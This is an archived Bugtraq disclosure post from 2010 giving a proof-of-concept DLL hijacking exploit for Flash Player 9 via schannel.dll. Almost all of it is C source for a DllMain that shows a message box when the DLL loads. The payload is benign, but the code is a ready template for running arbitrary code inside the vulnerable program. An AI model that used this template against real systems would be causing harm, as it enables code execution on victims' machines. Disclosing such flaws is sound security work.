Bugtraq mailing list archives

Flash Player 9 DLL Hijacking Exploit (schannel.dll)


From: info () securitylab ir
Date: 27 Aug 2010 09:54:19 -0000

=======================================================
Flash player 9.exe DLL Hijacking Exploit (schannel.dll)
=======================================================
Founded By: Securitylab.ir (Kamran Safaei Tabrizi)
=======================================================
include "stdafx.h"

void init() {
MessageBox(NULL,"Ops", "OpS!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}
=============================================


Current thread: